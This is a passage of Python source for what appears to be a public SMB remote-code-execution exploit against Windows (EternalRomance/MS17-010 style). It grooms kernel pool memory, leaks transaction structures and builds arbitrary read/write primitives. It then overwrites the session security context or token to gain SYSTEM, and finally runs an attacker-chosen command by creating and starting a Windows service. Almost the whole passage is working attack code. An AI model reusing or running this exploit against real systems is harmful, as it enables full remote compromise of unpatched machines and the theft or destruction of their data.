372 | 	# set new trans2 address
373 | 	info['trans2_addr'] = unpack_from('<'+fmt, read_data)[0] - info['TRANS_FLINK_OFFSET']
374 | 
375 | 	# set trans1.InData to &trans2
376 | 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], param=pack('<'+fmt, info['trans2_addr']), paramDisplacement=info['TRANS_INDATA_OFFSET'])
377 | 	wait_for_request_processed(conn)
378 | 
379 | 	# modify trans2 mid
380 | 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
381 | 	wait_for_request_processed(conn)
382 | 
383 | 	return read_data[8:]  # no need to return parameter
384 | 
385 | def write_data(conn, info, write_addr, write_data):
386 | 	# trans2.InData
387 | 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<'+info['PTR_FMT'], write_addr), dataDisplacement=info['TRANS_INDATA_OFFSET'])
388 | 	wait_for_request_processed(conn)
389 | 
390 | 	# write data
391 | 	conn.send_nt_trans_secondary(mid=info['trans2_mid'], data=write_data)
392 | 	wait_for_request_processed(conn)
393 | 
394 | 
395 | def align_transaction_and_leak(conn, tid, fid, info, numFill=4):
396 | 	trans_param = pack('<HH', fid, 0)  # param for NT_RENAME
397 | 	# fill large pagedpool holes (maybe no need)
398 | 	for i in range(numFill):
399 | 		conn.send_nt_trans(5, param=trans_param, totalDataCount=0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0)
400 | 
401 | 	mid_ntrename = conn.next_mid()
402 | 	req1 = conn.create_nt_trans_packet(5, param=trans_param, mid=mid_ntrename, data='A'*0x10d0, maxParameterCount=info['GROOM_DATA_SIZE']-0x10d0)
403 | 	req2 = conn.create_nt_trans_secondary_packet(mid_ntrename, data='B'*276) # leak more 276 bytes
404 | 
405 | 	req3 = conn.create_nt_trans_packet(5, param=trans_param, mid=fid, totalDataCount=info['GROOM_DATA_SIZE']-0x1000, maxParameterCount=0x1000)
406 | 	reqs = []
407 | 	for i in range(12):
408 | 		mid = next_extra_mid()
409 | 		reqs.append(conn.create_trans_packet('', mid=mid, param=trans_param, totalDataCount=info['BRIDE_DATA_SIZE']-0x200, totalParameterCount=0x200, maxDataCount=0, maxParameterCount=0))
410 | 
411 | 	conn.send_raw(req1[:-8])
412 | 	conn.send_raw(req1[-8:]+req2+req3+''.join(reqs))
413 | 
414 | 	# expected transactions alignment ("Frag" pool is not shown)
415 | 	#
416 | 	#    |         5 * PAGE_SIZE         |   PAGE_SIZE    |         5 * PAGE_SIZE         |   PAGE_SIZE    |
417 | 	#    +-------------------------------+----------------+-------------------------------+----------------+
418 | 	#    |    GROOM mid=mid_ntrename        |  extra_mid1 |         GROOM mid=fid            |  extra_mid2 |
419 | 	#    +-------------------------------+----------------+-------------------------------+----------------+
420 | 	#
421 | 	# If transactions are aligned as we expected, BRIDE transaction with mid=extra_mid1 will be leaked.
422 | 	# From leaked transaction, we get
423 | 	# - leaked transaction address from InParameter or InData
424 | 	# - transaction, with mid=extra_mid2, address from LIST_ENTRY.Flink
425 | 	# With these information, we can verify the transaction aligment from displacement.
426 | 
427 | 	leakData = conn.recv_transaction_data(mid_ntrename, 0x10d0+276)
428 | 	leakData = leakData[0x10d4:]  # skip parameters and its own input
429 | 	#open('leak.dat', 'wb').write(leakData)
430 | 
431 | 	if leakData[info['FRAG_TAG_OFFSET']:info['FRAG_TAG_OFFSET']+4] != 'Frag':
432 | 		print('Not found Frag pool tag in leak data')
433 | 		return None
434 | 
435 | 	# ================================
436 | 	# verify leak data
437 | 	# ================================
438 | 	leakData = leakData[info['FRAG_TAG_OFFSET']-4+info['FRAG_POOL_SIZE']:]
439 | 	# check pool tag and size value in buffer header
440 | 	expected_size = pack('<H', info['BRIDE_TRANS_SIZE'])
441 | 	leakTransOffset = info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE']
442 | 	if leakData[0x4:0x8] != 'LStr' or leakData[info['POOL_ALIGN']:info['POOL_ALIGN']+2] != expected_size or leakData[leakTransOffset+2:leakTransOffset+4] != expected_size:
443 | 		print('No transaction struct in leak data')
444 | 		return None
445 | 
446 | 	leakTrans = leakData[leakTransOffset:]
447 | 
448 | 	ptrf = info['PTR_FMT']
449 | 	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+ptrf*5, leakTrans, 8)
450 | 	inparam_value = unpack_from('<'+ptrf, leakTrans, info['TRANS_INPARAM_OFFSET'])[0]
451 | 	leak_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
452 | 
453 | 	print('CONNECTION: 0x{:x}'.format(connection_addr))
454 | 	print('SESSION: 0x{:x}'.format(session_addr))
455 | 	print('FLINK: 0x{:x}'.format(flink_value))
456 | 	print('InParam: 0x{:x}'.format(inparam_value))
457 | 	print('MID: 0x{:x}'.format(leak_mid))
458 | 
459 | 	next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
460 | 	if next_page_addr + info['GROOM_POOL_SIZE'] + info['FRAG_POOL_SIZE'] + info['POOL_ALIGN'] + info['SRV_BUFHDR_SIZE'] + info['TRANS_FLINK_OFFSET'] != flink_value:
461 | 		print('unexpected alignment, diff: 0x{:x}'.format(flink_value - next_page_addr))
462 | 		return None
463 | 	# trans1: leak transaction
464 | 	# trans2: next transaction
465 | 	return {
466 | 		'connection': connection_addr,
467 | 		'session': session_addr,
468 | 		'next_page_addr': next_page_addr,
469 | 		'trans1_mid': leak_mid,
470 | 		'trans1_addr': inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN,
471 | 		'trans2_addr': flink_value - info['TRANS_FLINK_OFFSET'],
472 | 	}
473 | 
474 | def exploit_matched_pairs(conn, pipe_name, info):
475 | 	# for Windows 7/2008 R2 and later
476 | 
477 | 	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
478 | 	conn.set_default_tid(tid)
479 | 	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
480 | 	fid = conn.nt_create_andx(tid, pipe_name)
481 | 
482 | 	info.update(leak_frag_size(conn, tid, fid))
483 | 	# add os and arch specific exploit info
484 | 	info.update(OS_ARCH_INFO[info['os']][info['arch']])
485 | 
486 | 	# groom: srv buffer header
487 | 	info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
488 | 	print('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
489 | 	# groom paramters and data is alignment by 8 because it is NT_TRANS
490 | 	info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']  # alignment (4)
491 | 
492 | 	# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
493 | 	bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
494 | 	info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
495 | 	print('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
496 | 	# bride paramters and data is alignment by 4 because it is TRANS
497 | 	info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
498 | 
499 | 	# ================================
500 | 	# try align pagedpool and leak info until satisfy
501 | 	# ================================
502 | 	leakInfo = None
503 | 	# max attempt: 10
504 | 	for i in range(10):
505 | 		reset_extra_mid(conn)
506 | 		leakInfo = align_transaction_and_leak(conn, tid, fid, info)
507 | 		if leakInfo is not None:
508 | 			break
509 | 		print('leak failed... try again')
510 | 		conn.close(tid, fid)
511 | 		conn.disconnect_tree(tid)
512 | 
513 | 		tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
514 | 		conn.set_default_tid(tid)
515 | 		fid = conn.nt_create_andx(tid, pipe_name)
516 | 
517 | 	if leakInfo is None:
518 | 		return False
519 | 
520 | 	info['fid'] = fid
521 | 	info.update(leakInfo)
522 | 
523 | 	# ================================
524 | 	# shift trans1.Indata ptr with SmbWriteAndX
525 | 	# ================================
526 | 	shift_indata_byte = 0x200
527 | 	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)
528 | 
529 | 	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
530 | 	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
531 | 	# maxParameterCount (0x1000), trans name (4), param (4)
532 | 	indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
533 | 	indata_next_trans_displacement = info['trans2_addr'] - indata_value
534 | 	conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
535 | 	wait_for_request_processed(conn)
536 | 
537 | 	# if the overwritten is correct, a modified transaction mid should be special_mid now.
538 | 	# a new transaction with special_mid should be error.
539 | 	recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
540 | 	if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
541 | 		print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
542 | 		print('!!! Write to wrong place !!!')
543 | 		print('the target might be crashed')
544 | 		return False
545 | 
546 | 	print('success controlling groom transaction')
547 | 
548 | 	# NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
549 | 	# but this method make the transation never get freed
550 | 	# I will avoid memory leak
551 | 
552 | 	# ================================
553 | 	# modify trans1 struct to be used for arbitrary read/write
554 | 	# ================================
555 | 	print('modify trans1 struct for arbitrary read/write')
556 | 	fmt = info['PTR_FMT']
557 | 	# modify trans_special.InData to &trans1
558 | 	conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
559 | 	wait_for_request_processed(conn)
560 | 
561 | 	# modify
562 | 	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself
563 | 	# - trans1.InData to &trans2. so we can modify trans2 easily
564 | 	conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
565 | 	wait_for_request_processed(conn)
566 | 
567 | 	# modify trans2.mid
568 | 	info['trans2_mid'] = conn.next_mid()
569 | 	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
570 | 	return True
571 | 
572 | def exploit_fish_barrel(conn, pipe_name, info):
573 | 	# for Windows Vista/2008 and earlier
574 | 
575 | 	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
576 | 	conn.set_default_tid(tid)
577 | 	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
578 | 	fid = conn.nt_create_andx(tid, pipe_name)
579 | 	info['fid'] = fid
580 | 
581 | 	if info['os'] == 'WIN7' and 'arch' not in info:
582 | 		# leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
583 | 		info.update(leak_frag_size(conn, tid, fid))
584 | 
585 | 	if 'arch' in info:
586 | 		# add os and arch specific exploit info
587 | 		info.update(OS_ARCH_INFO[info['os']][info['arch']])
588 | 		attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
589 | 	else:
590 | 		# do not know target architecture
591 | 		# this case is only for Windows 2003
592 | 		attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
593 | 
594 | 	# ================================
595 | 	# groom packets
596 | 	# ================================
597 | 	# sum of transaction name, parameters and data length is 0x1000
598 | 	# paramterCount = 0x100-TRANS_NAME_LEN
599 | 	print('Groom packets')
600 | 	trans_param = pack('<HH', info['fid'], 0)
601 | 	for i in range(12):
602 | 		mid = info['fid'] if i == 8 else next_extra_mid()
603 | 		conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)	
604 | 
605 | 	# ================================
606 | 	# shift transaction Indata ptr with SmbWriteAndX
607 | 	# ================================
608 | 	shift_indata_byte = 0x200
609 | 	conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
610 | 
611 | 	# ================================
612 | 	# Dangerous operation: attempt to control one transaction
613 | 	# ================================
614 | 	# POOL_ALIGN value is same as heap alignment value
615 | 	# TODO: try offset of 64 bit then 32 bit when no target architecture
616 | 	success = False
617 | 	for tinfo in attempt_list:
618 | 		print('attempt controlling next transaction on ' + tinfo['ARCH'])
619 | 		HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
620 | 		NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
621 | 
622 | 		# Below operation is dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
623 | 		conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
624 | 		wait_for_request_processed(conn)
625 | 
626 | 		# if the overwritten is correct, a modified transaction mid should be special_mid now.
627 | 		# a new transaction with special_mid should be error.
628 | 		recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
629 | 		if recvPkt.getNTStatus() == 0x10002:  # invalid SMB
630 | 			print('success controlling one transaction')
631 | 			success = True
632 | 			if 'arch' not in info:
633 | 				print('Target is '+tinfo['ARCH'])
634 | 				info['arch'] = tinfo['ARCH']
635 | 				info.update(OS_ARCH_INFO[info['os']][info['arch']])
636 | 			break
637 | 		if recvPkt.getNTStatus() != 0:
638 | 			print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
639 | 
640 | 	if not success:
641 | 		print('unexpected return status: 0x{:x}'.format(recvPkt.getNTStatus()))
642 | 		print('!!! Write to wrong place !!!')
643 | 		print('the target might be crashed')
644 | 		return False
645 | 
646 | 
647 | 	# NSA eternalromance modify transaction RefCount to keep controlled and reuse transaction after leaking info.
648 | 	# This is easy to to but the modified transaction will never be freed. The next exploit attempt might be harder
649 | 	#   because of this unfreed memory chunk. I will avoid it.
650 | 
651 | 	# modify transactions before leaking transaction info
652 | 	print('modify parameter count to 0xffffffff to be able to write backward')
653 | 	conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
654 | 	# on 64 bit, modify InParam last 4 bytes to \xff\xff\xff\xff to write backward
655 | 	# this works because all transaction with empty setup is allocated with RtlAllocateHeap()
656 | 	if info['arch'] == 'x64':
657 | 		conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
658 | 	wait_for_request_processed(conn)
659 | 
660 | 	TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
661 | 	PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
662 | 	PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT
663 | 
664 | 	# modify paramterCount of first transaction
665 | 	conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
666 | 	if info['arch'] == 'x64':
667 | 		conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
668 | 		# restore InParameters pointer before leaking next transaction
669 | 		conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
670 | 	wait_for_request_processed(conn)
671 | 
672 | 	# ================================
673 | 	# leak transaction
674 | 	# ================================
675 | 	print('leak next transaction')
676 | 	# modify TRANSACTION member to leak info
677 | 	# function=5 (NT_TRANS_RENAME)
678 | 	conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
679 | 	# parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
680 | 	conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])
681 | 
682 | 	conn.send_nt_trans_secondary(mid=special_mid)
683 | 	leakData = conn.recv_transaction_data(special_mid, 0x100)
684 | 	leakData = leakData[4:]  # remove param
685 | 	#open('leak.dat', 'wb').write(leakData)
686 | 
687 | 	# check heap chunk size value in leak data
688 | 	if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
689 | 		print('chunk size is wrong')
690 | 		return False
691 | 
692 | 	leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
693 | 	leakTrans = leakData[leakTranOffset:]
694 | 	fmt = info['PTR_FMT']
695 | 	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
696 | 	inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
697 | 	trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
698 | 
699 | 	print('CONNECTION: 0x{:x}'.format(connection_addr))
700 | 	print('SESSION: 0x{:x}'.format(session_addr))
701 | 	print('FLINK: 0x{:x}'.format(flink_value))
702 | 	print('InData: 0x{:x}'.format(indata_value))
703 | 	print('MID: 0x{:x}'.format(trans2_mid))
704 | 
705 | 	trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
706 | 	trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
707 | 	print('TRANS1: 0x{:x}'.format(trans1_addr))
708 | 	print('TRANS2: 0x{:x}'.format(trans2_addr))
709 | 
710 | 	# ================================
711 | 	# modify trans struct to be used for arbitrary read/write
712 | 	# ================================
713 | 	print('modify transaction struct for arbitrary read/write')
714 | 	# modify
715 | 	# - trans1.mid
716 | 	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself
717 | 	# - trans1.InData to &trans2. so we can modify trans2 easily
718 | 	TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
719 | 	conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
720 | 	wait_for_request_processed(conn)
721 | 
722 | 	trans1_mid = conn.next_mid()
723 | 	conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
724 | 	wait_for_request_processed(conn)
725 | 
726 | 	info.update({
727 | 		'connection': connection_addr,
728 | 		'session': session_addr,
729 | 		'trans1_mid': trans1_mid,
730 | 		'trans1_addr': trans1_addr,
731 | 		'trans2_mid': trans2_mid,
732 | 		'trans2_addr': trans2_addr,
733 | 	})
734 | 	return True
735 | 
736 | def create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr):
737 | 	SID_SYSTEM = pack('<BB5xB'+'I', 1, 1, 5, 18)
738 | 	SID_ADMINISTRATORS = pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
739 | 	SID_AUTHENICATED_USERS = pack('<BB5xB'+'I', 1, 1, 5, 11)
740 | 	SID_EVERYONE = pack('<BB5xB'+'I', 1, 1, 1, 0)
741 | 	# SID_SYSTEM and SID_ADMINISTRATORS must be added
742 | 	sids = [ SID_SYSTEM, SID_ADMINISTRATORS, SID_EVERYONE, SID_AUTHENICATED_USERS ]
743 | 	# - user has no attribute (0)
744 | 	# - 0xe: SE_GROUP_OWNER | SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT
745 | 	# - 0x7: SE_GROUP_ENABLED | SE_GROUP_ENABLED_BY_DEFAULT | SE_GROUP_MANDATORY
746 | 	attrs = [ 0, 0xe, 7, 7 ]
747 | 
748 | 	# assume its space is enough for SID_SYSTEM and SID_ADMINISTRATORS (no check)
749 | 	# fake user and groups will be in same buffer of original one
750 | 	# so fake sids size must NOT be bigger than the original sids
751 | 	fakeUserAndGroupCount = min(userAndGroupCount, 4)
752 | 	fakeUserAndGroupsAddr = userAndGroupsAddr
753 | 
754 | 	addr = fakeUserAndGroupsAddr + (fakeUserAndGroupCount * info['PTR_SIZE'] * 2)
755 | 	fakeUserAndGroups = ''
756 | 	for sid, attr in zip(sids[:fakeUserAndGroupCount], attrs[:fakeUserAndGroupCount]):
757 | 		fakeUserAndGroups += pack('<'+info['PTR_FMT']*2, addr, attr)
758 | 		addr += len(sid)
759 | 	fakeUserAndGroups += ''.join(sids[:fakeUserAndGroupCount])
760 | 
761 | 	return fakeUserAndGroupCount, fakeUserAndGroups
762 | 
763 | 
764 | def exploit(target, pipe_name, username, password, cmd):
765 | 	conn = MYSMB(target)
766 | 
767 | 	# set NODELAY to make exploit much faster
768 | 	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
769 | 
770 | 	info = {}
771 | 
772 | 	conn.login(username, password, maxBufferSize=4356)
773 | 	server_os = conn.get_server_os()
774 | 	print('Target OS: '+server_os)
775 | 	if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
776 | 		info['os'] = 'WIN7'
777 | 		info['method'] = exploit_matched_pairs
778 | 	elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10"):
779 | 		info['os'] = 'WIN8'
780 | 		info['method'] = exploit_matched_pairs
781 | 	elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith('Windows Vista'):
782 | 		info['os'] = 'WIN7'
783 | 		info['method'] = exploit_fish_barrel
784 | 	elif server_os.startswith("Windows Server 2003 "):
785 | 		info['os'] = 'WIN2K3'
786 | 		info['method'] = exploit_fish_barrel
787 | 	elif server_os.startswith("Windows 5.1"):
788 | 		info['os'] = 'WINXP'
789 | 		info['arch'] = 'x86'
790 | 		info['method'] = exploit_fish_barrel
791 | 	elif server_os.startswith("Windows XP "):
792 | 		info['os'] = 'WINXP'
793 | 		info['arch'] = 'x64'
794 | 		info['method'] = exploit_fish_barrel
795 | 	elif server_os.startswith("Windows 5.0"):
796 | 		info['os'] = 'WIN2K'
797 | 		info['arch'] = 'x86'
798 | 		info['method'] = exploit_fish_barrel
799 | 	else:
800 | 		print('This exploit does not support this target')
801 | 		sys.exit()
802 | 	
803 | 	if pipe_name is None:
804 | 		pipe_name = find_named_pipe(conn)
805 | 		if pipe_name is None:
806 | 			print('Not found accessible named pipe')
807 | 			return False
808 | 		print('Using named pipe: '+pipe_name)
809 | 	
810 | 	if not info['method'](conn, pipe_name, info):
811 | 		return False
812 | 	
813 | 	# Now, read_data() and write_data() can be used for arbitrary read and write.
814 | 	# ================================
815 | 	# Modify this SMB session to be SYSTEM
816 | 	# ================================	
817 | 	# Note: Windows XP stores only PCtxtHandle and uses ImpersonateSecurityContext() for impersonation, so this
818 | 	#         method does not work on Windows XP. But with arbitrary read/write, code execution is not difficult.
819 | 	fmt = info['PTR_FMT']
820 | 	
821 | 	print('make this SMB session to be SYSTEM')
822 | 	# IsNullSession = 0, IsAdmin = 1
823 | 	write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')
824 | 	
825 | 	# read session struct to get SecurityContext address
826 | 	sessionData = read_data(conn, info, info['session'], 0x100)
827 | 	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]
828 | 	
829 | 	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
830 | 		# the target has only PCtxtHandle for impersonation (Windows 2003 and earlier)
831 | 		# find the token and modify it
832 | 		if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
833 | 			pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
834 | 			pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
835 | 		else:
836 | 			pctxtDataAddr = secCtxAddr
837 | 	
838 | 		tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
839 | 		tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
840 | 		print('current TOKEN addr: 0x{:x}'.format(tokenAddr))
841 | 		
842 | 		# copy Token data for restoration
843 | 		tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
844 | 		
845 | 		userAndGroupCount = unpack_from('<I', tokenData, info['TOKEN_USER_GROUP_CNT_OFFSET'])[0]
846 | 		userAndGroupsAddr = unpack_from('<'+fmt, tokenData, info['TOKEN_USER_GROUP_ADDR_OFFSET'])[0]
847 | 		print('userAndGroupCount: 0x{:x}'.format(userAndGroupCount))
848 | 		print('userAndGroupsAddr: 0x{:x}'.format(userAndGroupsAddr))
849 | 	
850 | 		print('overwriting token UserAndGroups')
851 | 		# modify UserAndGroups info
852 | 		fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
853 | 		if fakeUserAndGroupCount != userAndGroupCount:
854 | 			write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', fakeUserAndGroupCount))
855 | 		write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
856 | 	else:
857 | 		# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
858 | 		# copy SecurityContext for restoration
859 | 		secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])
860 | 	
861 | 		print('overwriting session security context')
862 | 		# see FAKE_SECCTX detail at top of the file
863 | 		write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])
864 | 
865 | 
866 | 	# ================================
867 | 	# do whatever we want as SYSTEM over this SMB connection
868 | 	# ================================	
869 | 	smb_pwn(conn, info['arch'], cmd)
870 | 	#except:
871 | 	#	pass
872 | 
873 | 	# restore SecurityContext/Token
874 | 	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
875 | 		userAndGroupsOffset = userAndGroupsAddr - tokenAddr
876 | 		write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
877 | 		if fakeUserAndGroupCount != userAndGroupCount:
878 | 			write_data(conn, info, tokenAddr+info['TOKEN_USER_GROUP_CNT_OFFSET'], pack('<I', userAndGroupCount))
879 | 	else:
880 | 		write_data(conn, info, secCtxAddr, secCtxData)
881 | 	
882 | 	conn.disconnect_tree(conn.get_tid())
883 | 	conn.logoff()
884 | 	conn.get_socket().close()
885 | 	return True
886 | 
887 | 
888 | def smb_pwn(conn, arch, cmd):
889 | 	smbConn = conn.get_smbconnection()
890 | 	shell_cmd = r'cmd /c '
891 | 	shell_cmd += cmd
892 | 	service_exec(conn, shell_cmd)
893 | 
894 | # based on impacket/examples/serviceinstall.py
895 | def service_exec(conn, cmd):
896 | 	import random
897 | 	import string
898 | 	from impacket.dcerpc.v5 import transport, srvs, scmr
899 | 
900 | 	service_name = ''.join([random.choice(string.letters) for i in range(4)])
901 | 	print service_name
902 | 	# Setup up a DCE SMBTransport with the connection already in place
903 | 	rpcsvc = conn.get_dce_rpc('svcctl')
904 | 	rpcsvc.connect()
905 | 	rpcsvc.bind(scmr.MSRPC_UUID_SCMR)
906 | 	svnHandle = None
907 | 	try:
908 | 		print("Opening SVCManager on %s....." % conn.get_remote_host())
909 | 		resp = scmr.hROpenSCManagerW(rpcsvc)
910 | 		svcHandle = resp['lpScHandle']
911 | 
912 | 		# First we try to open the service in case it exists. If it does, we remove it.
913 | 		try:
914 | 			resp = scmr.hROpenServiceW(rpcsvc, svcHandle, service_name+'\x00')
915 | 		except Exception, e:
916 | 			if str(e).find('ERROR_SERVICE_DOES_NOT_EXIST') == -1:
917 | 				raise e  # Unexpected error
918 | 		else:
919 | 			# It exists, remove it
920 | 			scmr.hRDeleteService(rpcsvc, resp['lpServiceHandle'])
921 | 			scmr.hRCloseServiceHandle(rpcsvc, resp['lpServiceHandle'])
922 | 
923 | 		print('Creating service %s.....' % service_name)
924 | 		resp = scmr.hRCreateServiceW(rpcsvc, svcHandle, service_name + '\x00', service_name + '\x00', lpBinaryPathName=cmd + '\x00')
925 | 		serviceHandle = resp['lpServiceHandle']
926 | 
927 | 		if serviceHandle:
928 | 			# Start service
929 | 			try:
930 | 				print('Starting service %s.....' % service_name)
931 | 				scmr.hRStartServiceW(rpcsvc, serviceHandle)
932 | 				# is it really need to stop?
933 | 				# using command line always makes starting service fail because SetServiceStatus() does not get called
934 | 				print('Stoping service %s.....' % service_name)
935 | 				scmr.hRControlService(rpcsvc, serviceHandle, scmr.SERVICE_CONTROL_STOP)
936 | 			except Exception, e:
937 | 				print(str(e))
938 | 
